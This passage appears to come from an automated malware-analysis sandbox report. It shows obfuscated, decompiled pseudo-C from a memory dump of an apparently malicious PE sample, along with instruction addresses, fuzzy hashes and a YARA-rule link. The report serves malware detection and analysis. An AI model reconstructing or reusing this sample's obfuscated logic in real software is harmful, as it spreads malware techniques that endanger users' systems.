					_t733 = _t731 & 0x00000000 ^ _t871 & 0x00000000 ^  *(_t672 + 0x41c0c4);
					_t874 = _t871;
					if(_t733 > _t642) {
						_t193 = _t672 + 0x41d2e8; // 0x41d2e8
						_v32 = 0;
						 *_t900 =  *_t900 | _t193;
						_t196 = _t672 + 0x41ca71; // 0x41ca71
						 *_t900 =  *_t900 & 0x00000000;
						 *_t900 =  *_t900 ^ _t196;
						_t648 =  *((intOrPtr*)(_t672 + 0x41f064))(_t672, _v32);
						_push(_t874);
						 *(_t672 + 0x41c06b) =  *(_t672 + 0x41c06b) & 0x00000000;
						 *(_t672 + 0x41c06b) =  *(_t672 + 0x41c06b) | _t874 ^  *_t900 | _t648;
					}
					_pop( *_t202);
					_v40 = _t733;
					 *(_t672 + 0x41d067) =  *(_t672 + 0x41d067) & 0x00000000;
					 *(_t672 + 0x41d067) =  *(_t672 + 0x41d067) | _t733 & 0x00000000 ^ _v36;
					_t210 = _t672 + 0x41cefe; // 0x41cefe
					 *_t900 = _t210;
					_t645 =  *((intOrPtr*)(_t672 + 0x41f060))(_v40);
					_v40 = _t828;
					 *(_t672 + 0x41d336) =  *(_t672 + 0x41d336) & 0x00000000;
					 *(_t672 + 0x41d336) =  *(_t672 + 0x41d336) | _t828 - _v40 ^ _t645;
					return _t645;
				}
			}

0x02273a14
0x02273a14
0x02273a14
0x02273a15
0x02273a18
0x02273a1b
0x02273a1d
0x02273a20
0x02273a21
0x02273a24
0x02273a27
0x02273a2a
0x02273a2d
0x02273a30
0x02273a35
0x02273a35
0x02273a38
0x02273a40
0x02273a44
0x02273a45
0x02273a4c
0x02273a4e
0x02273a55
0x02273a5c
0x02273a5c
0x02273a67
0x02274153
0x0227446d
0x02274473
0x0227447c
0x0227447f
0x02274486
0x0227448a
0x02274493
0x02274494
0x02274497
0x0227449a
0x022744a0
0x022744a7
0x022744ad
0x022744b4
0x022744b7
0x022744bd
0x022744c5
0x022744cc
0x022744d2
0x022744d5
0x022744dc
0x022744e2
0x022744e9
0x022744ec
0x022744f2
0x022744fa
0x02274501
0x02274507
0x0227450a
0x02274511
0x02274517
0x0227451e
0x02274521
0x02274528
0x0227452b
0x0227452e
0x02274534
0x0227453c
0x02274543
0x02274549
0x02274549
0x02274159
0x02274159
0x0227415f
0x02274169
0x0227416c
0x02274172
0x0227417c
0x0227417f
0x0227418b
0x02274192
0x02274198
0x02274199
0x0227419f
0x022741a6
0x022741a9
0x022741af
0x022741b6
0x022741b9
0x022741c2
0x022741c5
0x022741ce
0x022741d1
0x022741dd
0x022741e0
0x022741e5
0x022741e9
0x022741ec
0x022741ee
0x022741fc
0x022741fe
0x02274201
0x02274203
0x0227420a
0x0227420e
0x02274211
0x02274217
0x0227421e
0x02274221
0x0227422d
0x02274234
0x0227423a
0x0227423a
0x02274240
0x02274244
0x02274248
0x0227424b
0x02274252
0x02274255
0x02274258
0x02274261
0x02274264
0x0227426a
0x02274272
0x02274279
0x0227427f
0x02274282
0x02274289
0x0227428c
0x0227428f
0x02274296
0x02274299
0x0227429c
0x022742a3
0x022742a7
0x022742aa
0x022742b1
0x022742b4
0x022742b7
0x022742c6
0x022742c9
0x022742d0
0x022742d6
0x022742d9
0x022742e0
0x022742e6
0x022742f0
0x022742f3
0x022742fa
0x022742fd
0x02274300
0x02274306
0x0227430d
0x02274310
0x0227431c
0x0227431f
0x02274322
0x02274329
0x0227432a
0x0227432d
0x0227432e
0x0227433d
0x0227433f
0x02274344
0x02274346
0x0227434c
0x02274353
0x02274356
0x0227435c
0x02274366
0x02274369
0x02274369
0x02274371
0x02274378
0x0227437e
0x0227437f
0x02274386
0x0227438d
0x02274390
0x02274393
0x02274399
0x022743a0
0x022743a6
0x022743a9
0x022743b0
0x022743b7
0x022743ba
0x022743bd
0x022743c5
0x022743cc
0x022743d2
0x022743d2
0x02274551
0x02274555
0x02274558
0x0227455b
0x02274562
0x02274565
0x02274568
0x02274571
0x02274574
0x0227457a
0x02274584
0x02274587
0x02274593
0x02274596
0x02274599
0x022745a0
0x022745a1
0x022745a4
0x022745b2
0x022745b4
0x022745b7
0x022745b9
0x022745bf
0x022745c9
0x022745cc
0x022745d2
0x022745dc
0x022745df
0x022745e5
0x022745ec
0x022745f2
0x022745f2
0x022745fe
0x02274603
0x0227460d
0x02274611
0x02274614
0x0227461a
0x02274621
0x02274624
0x0227462b
0x0227462e
0x02274631
0x0227463d
0x02274644
0x0227464a
0x02274654
0x02274657
0x0227465b
0x0227465f
0x02274662
0x02274668
0x02274672
0x02274675
0x02274681
0x02274688
0x0227468e
0x02274695
0x02274698
0x022746a1
0x022746a5
0x022746af
0x022746b2
0x022746b9
0x022746bc
0x022746bf
0x022746c5
0x022746cf
0x022746d2
0x022746d8
0x022746e0
0x022746e7
0x022746f2
0x022746f5
0x022746f8
0x02274700
0x02274704
0x0227470a
0x02274710
0x0227471a
0x0227471d
0x02274729
0x02274730
0x02274736
0x02274741
0x02274743
0x02274744
0x0227474a
0x02274754
0x02274757
0x0227475d
0x02274767
0x0227476a
0x02274773
0x02274776
0x02274781
0x02274788
0x0227478b
0x0227478e
0x02274791
0x02274792
0x02274793
0x022747a0
0x022747a5
0x022747a7
0x022747ad
0x022747b4
0x022747b7
0x022747bd
0x022747c4
0x022747c7
0x022747c7
0x022747cd
0x022747d4
0x022747da
0x022747dd
0x022747ed
0x022747f4
0x022747f7
0x022747fa
0x02274800
0x02274807
0x0227480a
0x02274812
0x02274819
0x0227481f
0x02274820
0x02274821
0x02274828
0x0227482b
0x0227482e
0x0227482f
0x02274832
0x02274835
0x02274836
0x02274839
0x0227483b
0x02274846
0x02274848
0x02274849
0x02274849
0x0227484d
0x02274850
0x02274853
0x02274856
0x02274857
0x0227485b
0x0227485c
0x0227485e
0x02274860
0x02274861
0x02274861
0x02274861
0x02274868
0x0227486b
0x0227486e
0x02274875
0x02274879
0x0227487c
0x02274883
0x02274887
0x0227488a
0x02274890
0x02274898
0x0227489f
0x022748a8
0x022748c1
0x02273a6d
0x02273a73
0x02273a76
0x02273a79
0x02273a7f
0x02273a89
0x02273a8c
0x02273a98
0x02273a9f
0x02273aa5
0x02273aa6
0x02273aad
0x02273ab0
0x02273ab3
0x02273aba
0x02273abd
0x02273ac0
0x02273ac7
0x02273aca
0x02273acd
0x02273ad4
0x02273ad8
0x02273adb
0x02273ae3
0x02273ae6
0x02273ae9
0x02273af0
0x02273af1
0x02273af4
0x02273af5
0x02273b04
0x02273b06
0x02273b0b
0x02273b0d
0x02273b14
0x02273b18
0x02273b1b
0x02273b24
0x02273b27
0x02273b2d
0x02273b2f
0x02273b36
0x02273b3c
0x02273b46
0x02273b4a
0x02273b4d
0x02273b50
0x02273b57
0x02273b5a
0x02273b5d
0x02273b63
0x02273b6d
0x02273b70
0x02273b79
0x02273b7c
0x02273b87
0x02273b8e
0x02273b91
0x02273b94
0x02273b97
0x02273b98
0x02273b99
0x02273ba4
0x02273ba6
0x02273bab
0x02273bad
0x02273bb3
0x02273bba
0x02273bbd
0x02273bc6
0x02273bc9
0x02273bc9
0x02273bcf
0x02273bd6
0x02273bdf
0x02273be5
0x02273bef
0x02273bf2
0x02273bf8
0x02273bff
0x02273c02
0x02273c08
0x02273c12
0x02273c15
0x02273c1c
0x02273c20
0x02273c23
0x02273c2f
0x02273c35
0x02273c39
0x02273c3c
0x02273c3f
0x02273c42
0x02273c43
0x02273c44
0x02273c4a
0x02273c4d
0x02273c50
0x02273c53
0x02273c55
0x02273c5c
0x02273c60
0x02273c63
0x02273c69
0x02273c70
0x02273c79
0x02273c7a
0x02273c7d
0x02273c80
0x02273c80
0x02273c8b
0x02273c91
0x02273c94
0x02273c9b
0x02273c9f
0x02273ca2
0x02273ca8
0x02273caf
0x02273cb2
0x02273cbe
0x02273cc5
0x02273ccb
0x02273ccc
0x02273cd3
0x02273cd7
0x02273cda
0x02273ce0
0x02273cea
0x02273ced
0x02273cf4
0x02273cf7
0x02273cfa
0x02273d00
0x02273d0a
0x02273d0d
0x02273d15
0x02273d18
0x02273d1f
0x02273d22
0x02273d25
0x02273d28
0x02273d29
0x02273d2a
0x02273d39
0x02273d3b
0x02273d40
0x02273d42
0x02273d48
0x02273d4f
0x02273d52
0x02273d59
0x02273d5c
0x02273d65
0x02273d66
0x02273d69
0x02273d6c
0x02273d6c
0x02273d7b
0x02273d84
0x02273d8b
0x02273d91
0x02273d92
0x02273d9b
0x02273d9e
0x02273da4
0x02273dab
0x02273dae
0x02273db4
0x02273dbe
0x02273dc1
0x02273dd0
0x02273dd7
0x02273dda
0x02273ddd
0x02273de0
0x02273de1
0x02273de2
0x02273ded
0x02273def
0x02273df4
0x02273df6
0x02273dfd
0x02273e00
0x02273e03
0x02273e0a
0x02273e0e
0x02273e11
0x02273e11
0x02273e19
0x02273e20
0x02273e26
0x02273e27
0x02273e27
0x02273e28
0x02273e2f
0x02273e32
0x02273e35
0x02273e3c
0x02273e3f
0x02273e42
0x02273e4e
0x02273e55
0x02273e5b
0x02273e5c
0x02273e63
0x02273e66
0x02273e69
0x02273e72
0x02273e7b
0x02273e7c
0x02273e7f
0x02273e82
0x02273e8d
0x02273e91
0x02273e94
0x02273e97
0x02273e9d
0x02273ea4
0x02273ead
0x02273eae
0x02273eb1
0x02273eb4
0x02273eba
0x02273ec0
0x02273eca
0x02273ecd
0x02273ed4
0x02273ed7
0x02273eda
0x02273ee0
0x02273eea
0x02273eed
0x02273ef6
0x02273ef9
0x02273eff
0x02273f02
0x02273f05
0x02273f0c
0x02273f10
0x02273f1e
0x02273f20
0x02273f23
0x02273f25
0x02273f2b
0x02273f35
0x02273f38
0x02273f3f
0x02273f43
0x02273f46
0x02273f4c
0x02273f52
0x02273f59
0x02273f5f
0x02273f60
0x02273f66
0x02273f6e
0x02273f75
0x02273f7e
0x02273f87
0x02273f8a
0x02273f90
0x02273f98
0x02273f9f
0x02273fa8
0x02273fa8

Memory Dump Source

Source File: 00000000.00000002.240076891.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72f08a90819b8a7d6b902a99b873cf3cacbcc3fbfee91f535511ca024593f170
Instruction ID: 842c53822e3298d7d141b2814f5dd1a321760f3068e65b4b99c111dca7e0b08b
Opcode Fuzzy Hash: 72f08a90819b8a7d6b902a99b873cf3cacbcc3fbfee91f535511ca024593f170
Instruction Fuzzy Hash: C8921172844608CFEF04DFA0C889BEEBBF5FF48310F1944AAD889AA145D7385565CF69

Uniqueness

Uniqueness Score: -1.00%

Function 02275262, Relevance: .7, Instructions: 740
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E02275262(signed int __ebx, signed int __ecx, void* __edi, signed int __esi) {
				signed int _t430;
				signed int _t432;
				intOrPtr _t438;
				signed int _t441;
				intOrPtr _t443;
				signed int _t445;
				void* _t447;
				signed int _t448;
				signed int _t451;
				signed int _t456;
				signed int _t462;
				void* _t463;
				signed int _t467;
				void* _t469;
				intOrPtr _t470;
				intOrPtr _t473;
				signed int _t475;
				void* _t476;
				signed int _t478;
				signed int _t483;
				signed int _t485;
				signed int _t488;
				signed int _t491;
				signed int _t495;
				void* _t497;
				void* _t498;
				signed int _t501;
				signed int _t506;
				signed int _t511;
				void* _t512;
				signed int _t514;
				void* _t516;
				signed int _t517;
				intOrPtr _t522;
				signed int _t523;
				signed int _t525;
				void* _t527;
				signed int _t528;
				signed int _t532;
				void* _t534;
				signed int _t535;
				signed int _t538;
				signed int _t541;
				intOrPtr _t544;
				signed int _t552;
				signed int _t554;
				void* _t555;
				signed int _t564;
				signed int _t567;
				signed int _t570;
				signed int _t572;
				signed int _t575;
				void* _t577;
				void* _t579;
				signed int _t586;
				signed int _t588;
				void* _t589;
				signed int _t594;
				signed int _t596;
				void* _t599;
				signed int _t601;
				signed int _t603;
				signed int _t609;
				void* _t612;
				signed int _t615;
				signed int _t618;
				signed int _t620;
				signed int _t623;
				signed int _t625;
				signed int _t627;
				signed int _t629;
				signed int _t632;
				signed int _t636;
				signed int _t639;
				signed int _t642;
				signed int _t645;
				signed int _t648;
				signed int _t651;
				signed int _t654;
				signed int _t657;
				void* _t660;
				signed int _t664;
				signed int _t666;
				signed int _t669;
				signed int _t672;
				signed int _t676;
				intOrPtr* _t680;
				signed int _t682;
				signed int _t685;
				signed int _t688;
				void* _t691;
				signed int _t693;
				void* _t694;
				signed int _t696;
				signed int _t701;
				signed int _t702;
				signed int _t705;
				void* _t706;
				signed int _t708;
				signed int _t709;
				signed int _t712;
				signed int _t715;
				signed int _t718;
				signed int _t729;
				signed int _t732;
				signed int _t733;
				signed int _t741;
				signed int _t744;
				void* _t745;
				signed int _t747;
				signed int* _t757;
				signed int* _t758;
				signed int* _t759;
				signed int* _t760;
				signed int* _t761;
				signed int* _t762;
				signed int* _t763;
				signed int* _t764;

				_t701 = __esi;
				_t564 = __ebx;
				 *(_t741 - 0x14) = 0;
				_push( *(_t741 - 0x14));
				 *_t757 =  *_t757 ^ __ebx + 0x0041c349;
				_push(_t632);
				 *_t757 =  *_t757 ^ _t632;
				 *_t757 =  *_t757 | __ebx + 0x0041c1b7;
				_t430 =  *((intOrPtr*)(__ebx + 0x41f068))();
				 *(_t741 - 0x14) = __ecx;
				 *(__ebx + 0x41cf63) =  *(__ebx + 0x41cf63) & 0x00000000;
				 *(__ebx + 0x41cf63) =  *(__ebx + 0x41cf63) ^ __ecx -  *(_t741 - 0x14) ^ _t430;
				_t676 =  *(__edi + 0x80);
				_t14 = _t564 + 0x41ce92; // 0x41ce92
				_push(_t741);
				 *_t757 =  *_t757 & 0x00000000;
				 *_t757 =  *_t757 + _t14;
				_t432 =  *((intOrPtr*)(__ebx + 0x41f060))();
				 *(_t741 - 0x10) = _t676;
				 *(__ebx + 0x41d0ab) =  *(__ebx + 0x41d0ab) & 0x00000000;
				 *(__ebx + 0x41d0ab) =  *(__ebx + 0x41d0ab) ^ _t676 & 0x00000000 ^ _t432;
				 *(_t741 - 0x10) = _t432;
				_push( *((intOrPtr*)(_t741 + 8)) +  *(_t741 - 0x10));
				_pop(_t680);
				_t25 = _t564 + 0x41cade; // 0x41cade
				_push(_t741);
				 *_t757 =  *_t757 & 0x00000000;
				 *_t757 =  *_t757 ^ _t25;
				_t26 = _t564 + 0x41c3a5; // 0x41c3a5
				_push(__ebx);
				 *_t757 =  *_t757 & 0x00000000;
				 *_t757 =  *_t757 | _t26;
				_t438 =  *((intOrPtr*)(__ebx + 0x41f068))();
				 *_t757 = _t741;
				 *((intOrPtr*)(__ebx + 0x41c073)) = _t438;
				_t744 = 0;
				do {
					if( *_t680 != 0) {
						 *_t46 =  *_t680;
						_t702 =  *(_t744 - 0x14);
						_t48 = _t564 + 0x41d32a; // 0x41d32a
						 *_t757 =  *_t757 & 0x00000000;
						 *_t757 =  *_t757 ^ _t48;
						_t49 = _t564 + 0x41cdb4; // 0x41cdb4
						 *_t757 =  *_t757 ^ _t744;
						 *_t757 = _t49;
						_t441 =  *((intOrPtr*)(_t564 + 0x41f068))(_t744, _t744);
						 *(_t564 + 0x41cada) =  *(_t564 + 0x41cada) & 0x00000000;
						 *(_t564 + 0x41cada) =  *(_t564 + 0x41cada) | _t632 & 0x00000000 ^ _t441;
						_t632 = _t632;
					} else {
						_t29 = _t570 + 0x41d076; // 0x41d076
						 *(_t744 - 0x10) = 0;
						 *_t761 =  *_t761 | _t29;
						_t552 =  *((intOrPtr*)(_t570 + 0x41f060))( *(_t744 - 0x10));
						 *(_t744 - 0x14) = _t701;
						 *(_t570 + 0x41d0ee) = 0 ^ _t552;
						_push( *(_t680 + 0x10));
						_pop( *_t37);
						_push( *(_t744 - 0x10));
						_pop(_t702);
						_t39 = _t570 + 0x41c2b0; // 0x41c2b0
						 *_t761 = _t39;
						_t554 =  *((intOrPtr*)(_t570 + 0x41f060))( *(_t744 - 0x10));
						 *(_t570 + 0x41c1b3) =  *(_t570 + 0x41c1b3) & 0x00000000;
						 *(_t570 + 0x41c1b3) =  *(_t570 + 0x41c1b3) | _t744 ^  *_t761 | _t554;
						_t744 = _t744;
					}
					_t636 =  *_t757;
					 *_t757 =  *(_t680 + 0x10);
					_t57 = _t564 + 0x41c661; // 0x41c661
					 *_t757 =  *_t757 ^ _t744;
					 *_t757 =  *_t757 + _t57;
					_t443 =  *((intOrPtr*)(_t564 + 0x41f060))(_t632);
					 *_t757 = _t702;
					 *((intOrPtr*)(_t564 + 0x41d31e)) = _t443;
					_t705 = 0;
					 *_t60 = _t744;
					_t61 = _t564 + 0x41c5b3; // 0x41c5b3
					 *_t757 = _t61;
					_t445 =  *((intOrPtr*)(_t564 + 0x41f060))( *(_t744 - 0x10));
					 *(_t744 - 0x14) =  *(_t744 - 0x14) & 0x00000000;
					 *_t757 =  *_t757 ^ _t445;
					_t67 = _t564 + 0x41c868; // 0x41c868
					 *_t757 =  *_t757 & 0x00000000;
					 *_t757 =  *_t757 ^ _t67;
					_t447 =  *((intOrPtr*)(_t564 + 0x41f060))( *(_t744 - 0x14));
					 *_t69 = _t680;
					_t586 = 0 ^  *(_t744 - 0x10);
					 *_t71 = _t447;
					 *(_t744 - 0x14) =  *(_t744 - 0x14) + _t586;
					_push( *(_t744 - 0x14));
					_pop(_t448);
					_t682 = _t680;
					 *(_t744 - 0x14) = _t448;
					_t588 = _t586 & 0x00000000 ^ _t448 & 0x00000000 ^  *(_t564 + 0x41c633);
					_t451 =  *(_t744 - 0x14);
					if(_t588 > _t451) {
						_t78 = _t564 + 0x41c5b3; // 0x41c5b3
						 *_t757 = _t78;
						_t80 = _t564 + 0x41c868; // 0x41c868
						 *(_t744 - 0x10) =  *(_t744 - 0x10) & 0x00000000;
						 *_t757 =  *_t757 | _t80;
						_t451 =  *((intOrPtr*)(_t564 + 0x41f064))( *(_t744 - 0x10),  *(_t744 - 0x14));
					}
					 *(_t744 - 0x10) = _t636;
					 *(_t564 + 0x41c2a0) =  *(_t564 + 0x41c2a0) & 0x00000000;
					 *(_t564 + 0x41c2a0) =  *(_t564 + 0x41c2a0) | _t636 & 0x00000000 ^ _t451;
					_t639 =  *(_t744 - 0x10);
					 *(_t744 - 0x10) = _t564;
					_t567 =  *(_t744 - 0x10);
					 *_t757 =  *_t757 & 0x00000000;
					 *_t757 =  *_t757 | _t451 & 0x00000000 | _t564 & 0x00000000 ^  *(_t744 + 8);
					_t94 = _t567 + 0x41c812; // 0x41c812
					 *_t757 =  *_t757 & 0x00000000;
					 *_t757 =  *_t757 + _t94;
					_t95 = _t567 + 0x41ca65; // 0x41ca65
					 *_t757 =  *_t757 & 0x00000000;
					 *_t757 =  *_t757 | _t95;
					_t456 =  *((intOrPtr*)(_t567 + 0x41f068))(_t588, _t705);
					 *(_t744 - 0x14) = _t682;
					 *(_t567 + 0x41d25f) =  *(_t567 + 0x41d25f) & 0x00000000;
					 *(_t567 + 0x41d25f) =  *(_t567 + 0x41d25f) ^ (_t682 -  *(_t744 - 0x14) | _t456);
					_t685 =  *(_t744 - 0x14);
					 *_t104 = _t588;
					 *_t757 =  *_t757 ^ _t705;
					_push( *((intOrPtr*)(_t744 - 8)));
					_pop(_t706);
					 *((intOrPtr*)(_t744 - 8)) = _t706 +  *(_t744 - 0x10);
					_t708 = 0;
					_t108 = _t567 + 0x41d15d; // 0x41d15d
					 *_t757 =  *_t757 - _t588;
					 *_t757 = _t108;
					_t109 = _t567 + 0x41c260; // 0x41c260
					 *(_t744 - 0x10) = 0;
					 *_t757 =  *_t757 | _t109;
					_push( *((intOrPtr*)(_t567 + 0x41f068))( *(_t744 - 0x10), _t588));
					_pop( *_t113);
					_push( *(_t744 - 0x10));
					_pop( *_t115);
					_push( *((intOrPtr*)(_t685 + 0xc)));
					_pop( *_t117);
					_push( *(_t744 - 0x14));
					_pop(_t589);
					 *_t757 =  *_t757 & 0x00000000;
					 *_t757 =  *_t757 + _t589;
					_t119 = _t567 + 0x41ca52; // 0x41ca52
					 *_t757 =  *_t757 - _t567;
					 *_t757 =  *_t757 + _t119;
					_t462 =  *((intOrPtr*)(_t567 + 0x41f060))(_t567, _t567);
					 *(_t744 - 0x14) = _t639;
					 *(_t567 + 0x41cd09) =  *(_t567 + 0x41cd09) & 0x00000000;
					 *(_t567 + 0x41cd09) =  *(_t567 + 0x41cd09) | _t639 -  *(_t744 - 0x14) ^ _t462;
					_t642 =  *(_t744 - 0x14);
					_t758 = _t757 - 0xfffffffc;
					_push(0);
					 *_t758 =  *_t758 | _t462;
					_push( *_t757);
					_pop(_t463);
					 *_t758 = _t463 +  *(_t744 + 8);
					_t130 = _t567 + 0x41c07f; // 0x41c07f
					 *_t758 = _t130;
					_t467 =  *((intOrPtr*)(_t567 + 0x41f060))( *(_t744 - 0x10),  *(_t744 - 0x14));
					 *_t758 =  *_t758 - _t642;
					 *_t758 =  *_t758 | _t467;
					_t133 = _t567 + 0x41d248; // 0x41d248
					 *(_t744 - 0x14) =  *(_t744 - 0x14) & 0x00000000;
					 *_t758 =  *_t758 | _t133;
					_t469 =  *((intOrPtr*)(_t567 + 0x41f060))( *(_t744 - 0x14), _t642);
					_t594 =  *_t758;
					_t759 =  &(_t758[1]);
					 *(_t744 - 0x10) = _t567;
					_push(_t594 + _t469);
					_t570 =  *(_t744 - 0x10);
					_pop(_t470);
					_t596 = _t594 & 0x00000000 ^ _t642 -  *_t759 ^  *(_t570 + 0x41d0e6);
					_t645 = _t642;
					if(_t596 > _t470) {
						_t141 = _t570 + 0x41c07f; // 0x41c07f
						 *(_t744 - 0x14) =  *(_t744 - 0x14) & 0x00000000;
						 *_t759 =  *_t759 + _t141;
						_t145 = _t570 + 0x41d248; // 0x41d248
						 *(_t744 - 0x14) = 0;
						 *_t759 =  *_t759 | _t145;
						_t470 =  *((intOrPtr*)(_t570 + 0x41f064))( *(_t744 - 0x14),  *(_t744 - 0x14));
						 *(_t744 - 0x10) = _t708;
						 *((intOrPtr*)(_t570 + 0x41cd68)) = _t470;
						_t708 =  *(_t744 - 0x10);
					}
					_pop( *_t152);
					 *_t759 = _t596 & 0x00000000 ^  *(_t744 - 0x10);
					_t599 = _t708;
					_t709 = _t599 +  *(_t744 + 8);
					_t601 = 0;
					 *_t759 =  *_t759 & 0x00000000;
					 *_t759 =  *_t759 | _t601;
					_t155 = _t570 + 0x41d135; // 0x41d135
					 *_t759 = _t155;
					_t157 = _t570 + 0x41c60e; // 0x41c60e
					 *_t759 =  *_t759 & 0x00000000;
					 *_t759 =  *_t759 | _t157;
					_t473 =  *((intOrPtr*)(_t570 + 0x41f068))(_t601,  *(_t744 - 0x10), _t470);
					 *(_t744 - 0x14) = _t645;
					 *((intOrPtr*)(_t570 + 0x41c3e6)) = _t473;
					_t648 =  *(_t744 - 0x14);
					_t603 =  *_t759;
					_t760 = _t759 - 0xfffffffc;
					 *_t760 =  *_t760 - _t648;
					 *_t760 =  *_t760 ^ _t603;
					_t162 = _t570 + 0x41c220; // 0x41c220
					 *(_t744 - 0x14) = 0;
					 *_t760 =  *_t760 + _t162;
					_t475 =  *((intOrPtr*)(_t570 + 0x41f060))( *(_t744 - 0x14), _t648);
					 *(_t744 - 0x10) = _t603;
					 *(_t570 + 0x41cf1d) =  *(_t570 + 0x41cf1d) & 0x00000000;
					 *(_t570 + 0x41cf1d) =  *(_t570 + 0x41cf1d) ^ (_t603 ^  *(_t744 - 0x10) | _t475);
					_t476 =  *((intOrPtr*)(_t570 + 0x41f054))();
					 *(_t744 - 0x14) = 0;
					 *_t760 =  *_t760 + _t476;
					_t176 = _t570 + 0x41c49b; // 0x41c49b
					 *(_t744 - 0x10) = 0;
					 *_t760 =  *_t760 + _t176;
					_t478 =  *((intOrPtr*)(_t570 + 0x41f060))( *(_t744 - 0x10),  *(_t744 - 0x14));
					 *(_t744 - 0x14) = _t709;
					 *(_t570 + 0x41c8aa) =  *(_t570 + 0x41c8aa) & 0x00000000;
					 *(_t570 + 0x41c8aa) =  *(_t570 + 0x41c8aa) | _t709 & 0x00000000 ^ _t478;
					_t712 =  *(_t744 - 0x14);
					_t761 = _t760 - 0xfffffffc;
					 *(_t744 - 0x10) = _t648;
					 *(_t744 - 4) =  *(_t744 - 4) & 0x00000000;
					 *(_t744 - 4) =  *(_t744 - 4) ^ _t648 -  *(_t744 - 0x10) ^ _t478 & 0x00000000 ^  *_t760;
					_t651 =  *(_t744 - 0x10);
					_t193 = _t570 + 0x41c279; // 0x41c279
					 *_t761 = _t193;
					_t195 = _t570 + 0x41d1ea; // 0x41d1ea
					 *_t761 =  *_t761 - _t712;
					 *_t761 = _t195;
					_t483 =  *((intOrPtr*)(_t570 + 0x41f068))(_t712,  *(_t744 - 0x14));
					 *(_t744 - 0x14) =  *(_t744 - 0x10);
					 *(_t570 + 0x41cbc5) = 0 ^ _t483;
					_t609 =  *(_t744 - 0x14);
					do {
						if(( *_t712 & 0x80000000) != 0) {
							_t761[1] =  *_t712;
							_t572 = _t570;
							 *_t761 =  *_t761 ^ _t712;
							 *_t761 =  *_t761 ^ _t572 + 0x0041d099;
							_t485 =  *((intOrPtr*)(_t572 + 0x41f060))(_t744);
							 *_t761 = _t609;
							 *(_t572 + 0x41c24c) = 0 ^ _t485;
							_t612 = 0;
							 *_t299 = _t712;
							 *_t761 =  *_t761 & 0x00000000;
							 *_t761 =  *_t761 + _t572 + 0x41cdd2;
							 *_t761 =  *_t761 & 0x00000000;
							 *_t761 =  *_t761 | _t572 + 0x0041c846;
							_t488 =  *((intOrPtr*)(_t572 + 0x41f068))(_t744, _t685);
							 *(_t744 - 0x10) = _t651;
							 *(_t572 + 0x41c9fe) = 0 ^ _t488;
							_t654 =  *(_t744 - 0x10);
							 *(_t744 - 0xc) =  *(_t744 - 0xc) & 0x0000ffff;
							 *_t761 =  *_t761 ^ _t654;
							 *_t761 =  *_t761 | _t572 + 0x0041c9e4;
							 *_t761 =  *_t761 & 0x00000000;
							 *_t761 =  *_t761 ^ _t572 + 0x0041c746;
							_t491 =  *((intOrPtr*)(_t572 + 0x41f068))(_t654, _t654);
							 *(_t744 - 0x14) = _t654;
							 *(_t572 + 0x41c559) =  *(_t572 + 0x41c559) & 0x00000000;
							 *(_t572 + 0x41c559) =  *(_t572 + 0x41c559) ^ (_t654 ^  *(_t744 - 0x14) | _t491);
							_t657 =  *(_t744 - 0x14);
						} else {
							_t202 = _t570 + 0x41c8e1; // 0x41c8e1
							 *_t761 =  *_t761 - _t651;
							 *_t761 =  *_t761 | _t202;
							_t525 =  *((intOrPtr*)(_t570 + 0x41f060))(_t651);
							 *(_t744 - 0x10) = 0;
							 *_t761 =  *_t761 | _t525;
							_t206 = _t570 + 0x41c6e2; // 0x41c6e2
							 *_t761 =  *_t761 - _t570;
							 *_t761 =  *_t761 | _t206;
							_t527 =  *((intOrPtr*)(_t570 + 0x41f060))(_t570,  *(_t744 - 0x10));
							_t623 = (_t609 & 0x00000000) +  *_t761;
							_t764 = _t761 - 0xfffffffc;
							 *_t764 =  *_t764 + _t685;
							_t691 = _t527;
							_t528 = _t691 + _t623;
							_t693 = 0;
							 *(_t744 - 0x10) = _t651;
							_t625 = _t623 & 0x00000000 ^ _t651 ^  *(_t744 - 0x10) ^  *(_t570 + 0x41c521);
							_t664 =  *(_t744 - 0x10);
							if(_t625 > _t528) {
								_t212 = _t570 + 0x41c8e1; // 0x41c8e1
								 *_t764 =  *_t764 & 0x00000000;
								 *_t764 =  *_t764 | _t212;
								_t213 = _t570 + 0x41c6e2; // 0x41c6e2
								 *_t764 = _t213;
								_t528 =  *((intOrPtr*)(_t570 + 0x41f064))( *(_t744 - 0x10), _t712);
							}
							 *(_t570 + 0x41c56c) =  *(_t570 + 0x41c56c) & 0x00000000;
							 *(_t570 + 0x41c56c) =  *(_t570 + 0x41c56c) ^ (_t744 & 0x00000000 | _t528);
							_t744 = _t744;
							 *_t764 =  *_t764 & 0x00000000;
							 *_t764 =  *_t764 + _t712;
							_t220 = _t570 + 0x41c266; // 0x41c266
							 *_t764 = _t220;
							_push( *((intOrPtr*)(_t570 + 0x41f060))( *(_t744 - 0x10), _t528));
							_pop( *_t223);
							_push( *(_t744 - 0x10));
							_pop( *_t225);
							_t729 =  *_t712;
							_t226 = _t570 + 0x41ce1f; // 0x41ce1f
							 *_t764 =  *_t764 & 0x00000000;
							 *_t764 =  *_t764 ^ _t226;
							_t532 =  *((intOrPtr*)(_t570 + 0x41f060))(_t729);
							 *(_t744 - 0x10) = 0;
							 *_t764 =  *_t764 ^ _t532;
							_t230 = _t570 + 0x41c0ad; // 0x41c0ad
							 *(_t744 - 0x14) =  *(_t744 - 0x14) & 0x00000000;
							 *_t764 =  *_t764 | _t230;
							_t534 =  *((intOrPtr*)(_t570 + 0x41f060))( *(_t744 - 0x14),  *(_t744 - 0x10));
							_pop( *_t235);
							_t627 = _t625 & 0x00000000 |  *(_t744 - 0x14);
							 *_t237 = _t534;
							 *(_t744 - 0x10) =  *(_t744 - 0x10) + _t627;
							_push( *(_t744 - 0x10));
							_pop(_t535);
							_t666 = _t664;
							 *(_t744 - 0x10) = _t729;
							_t629 = _t627 & 0x00000000 | _t729 & 0x00000000 ^  *(_t570 + 0x41c765);
							_t732 =  *(_t744 - 0x10);
							if(_t629 > _t535) {
								_t244 = _t570 + 0x41ce1f; // 0x41ce1f
								 *_t764 = _t244;
								_t246 = _t570 + 0x41c0ad; // 0x41c0ad
								 *_t764 =  *_t764 & 0x00000000;
								 *_t764 =  *_t764 | _t246;
								_t535 =  *((intOrPtr*)(_t570 + 0x41f064))(_t744,  *(_t744 - 0x14));
							}
							 *_t764 = _t666;
							 *(_t570 + 0x41c497) = 0 ^ _t535;
							_t669 = 0;
							 *_t764 = _t693;
							_t694 = _t732;
